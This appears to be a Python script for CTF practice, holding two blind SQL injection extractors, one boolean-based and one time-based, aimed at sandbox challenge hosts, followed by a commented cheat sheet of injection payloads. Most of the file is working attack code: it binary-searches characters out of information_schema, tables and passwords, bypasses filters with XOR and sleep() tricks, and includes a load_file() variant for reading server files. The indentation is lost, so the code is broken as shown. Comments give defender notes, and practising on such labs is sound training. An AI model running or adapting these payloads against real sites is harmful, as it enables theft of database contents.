import requests
#url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
#url = "http://localhost/sqli-labs-master/Less-1/?id=1'"
# Boolean-based blind SQL injection extractor written against a CTF sandbox
# challenge.  Each character of the selected value is recovered by binary-
# searching its ASCII code in [32, 127); the oracle is whether the literal
# 'query_success' appears in the HTTP response body (see the check below).
# Indentation was lost in this copy, so the nesting of the loops below is
# inferred from statement order and should be re-checked before use.
# Defender's note: the traffic this produces is a long run of GETs whose only
# difference is a numeric constant inside a SELECT on information_schema / an
# application table -- easy to alert on server-side, and impossible to reach
# once the application binds the `id` parameter instead of interpolating it.
url = "http://challenge-8001a3f6b43953f3.sandbox.ctfhub.com:10080/"
# Accumulates every recovered character (plus the separator added per outer
# iteration) across the whole run.
result = ''
# Original note: estimated ~10 rows (limit 0..9); group_concat would repeat them.
for code in range(0, 10):
result += " --- next limit data : "
# Character positions 1..49 of the selected value.
for x in range(1, 50):
#for x in range(70, 100):
# Binary search bounds over printable ASCII; `mid` converges on the code point
# when the loop exits (high == low => mid == low).
high = 127
low = 32
mid = (low + high) // 2
while high > low:
# Original note: load_file() variant (out-of-band read of a file on the host).
#payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
# Original note: database name.
#payload = "and ascii(substr((select database()),%d,1))>%d--+" % (x, mid)
# Original note: table name.
#payload = "and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d --+" % (code,x, mid)
# Original note: column name.
#payload = "and ascii(substr((select column_name from information_schema.columns where table_name='users' limit %d,1),%d,1))>%d --+" % (code,x, mid)
# Original note: adjust as needed; `and` is filtered on this target.
# The three assignments below are each overwritten by the next one (and by the
# final assignment before the request), so none of them is ever sent --
# assuming they share one loop body, as the statement order suggests.
payload = "?id=if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)
payload = "?id=if(ascii(substr((select column_name from information_schema.columns where table_name='flag' limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)
payload = "?id=if(ascii(substr((select flag from flag limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)
# Original note: `and`, spaces and `if` are filtered (two XORs were required;
# the author was unsure why).  The labels in the group below describe the
# commented payload on the line *above* them.
#payload = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(x,mid)
# Original note: database names (label for the line above).
#payload = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),%d,1))>%d)^1"%(x, mid)
# Original note: table names (label for the line above).
#payload = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(x,mid)
# Original note: table names (label for the line above).
#payload = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(x,mid)
# Original note: column names (label for the line above).
# This is the payload that is actually sent.  Note it does not use `code`, so
# each outer iteration presumably repeats the same extraction.
payload = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1"%(x, mid)
#print(payload)
# Probe: no `timeout=` is passed, so an unresponsive server blocks this loop
# indefinitely.
response = requests.get(url + payload)
# Oracle: the marker string in the body means "code point > mid".
if 'query_success' in response.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
# `mid` is now the resolved code point for position `x`.
print(mid)
result += chr(mid)
# A space (32, the lower search bound) is taken as end-of-value; this
# presumably ends the position loop and moves to the next outer iteration.
if (mid == 32):
print(result)
break;
print("[*] the name are {0}".format(result))
# Original cheat-sheet notes follow (other functions).
# Original note: ascii() can be replaced by ord(), substr() by mid().
#?id=-1' or ascii(substr((select database() limit 0,1),1,1))>111--+
#?id=-1'%20or%20left(database(),2)='se'%20--+
# Original note: regex.
#?id=-1'or%20(database()%20regexp%20'^sec')=1--+
#select user like 'ro%'
#IF(expr1,expr2,expr3)
#if(ascii(substr(database(),1,1))>115,0,sleep(5))--+
import requests
import time
# Time-based blind SQL injection extractor (second copy of the script above,
# same binary search over ASCII [32, 127)).  Here the oracle is wall-clock
# time: the payload's false branch calls sleep(5), and a request that takes
# 4 s or more is read as that branch.  Any other cause of a slow response
# (network latency, server load) is classified the same way, and no
# `timeout=` is passed to requests.get().  As above, indentation was lost in
# this copy and the loop nesting is inferred from statement order.
# Defender's note: the bimodal response-time pattern (fast vs. ~5 s) over a
# long sequence of otherwise identical requests is itself a detection signal.
# Three targets are assigned in a row; only the last one is used.
url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
url = "http://localhost/sqli-labs-master/Less-1/?id=1'"
url = "http://challenge-4209e5f8252d6563.sandbox.ctfhub.com:10080/"
# Accumulates every recovered character across the whole run.
result = ''
for code in range(0,10):
# Positions start at 7 here -- presumably the first six characters had already
# been recovered in an earlier run (not shown).
for x in range(7, 50):
# Binary search bounds over printable ASCII; `mid` converges on the code point
# when the loop exits (high == low => mid == low).
high = 127
low = 32
mid = (low + high) // 2
while high > low:
# Original note: load_file() variant (out-of-band read of a file on the host).
#payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
# Original note: database name.
#payload = "?id=1 and if(ascii(substr(database(),%d,1))>%d,1,sleep(5))--+" % (x, mid)
# Original note: table name.  This assignment is overwritten by the one below
# before the request is made, so it is never sent.
payload = "?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
# Original note: column name.
#payload = "and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
# Original note: field (column value).  This is the payload actually sent;
# `code` selects the row via LIMIT, `x` the character position, `mid` the
# comparison threshold.
payload = "?id=1 and if(ascii(substr((select flag from flag limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
#print(payload)
#payload = "?id=1 and if(1=1,1,sleep(10))--+"
# Timing oracle: elapsed time under 4 s => the `1` branch (code point > mid);
# otherwise the sleep(5) branch is assumed.
ss = time.time()
response = requests.get(url + payload)
if time.time() - ss < 4:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
# `mid` is now the resolved code point for position `x`.
print(mid)
result += chr(mid)
# A space (32, the lower search bound) is taken as end-of-value; this
# presumably ends the position loop and moves to the next outer iteration.
if (mid == 32):
print(result)
break;
print("[*] the name are {0}".format(result))
# Original cheat-sheet notes follow (other functions).
# Original note: ascii() can be replaced by ord(), substr() by mid().
#?id=-1' or ascii(substr((select database() limit 0,1),1,1))>111--+
#?id=-1'%20or%20left(database(),2)='se'%20--+
# Original note: regex.
#?id=-1'or%20(database()%20regexp%20'^sec')=1--+
#select user like 'ro%'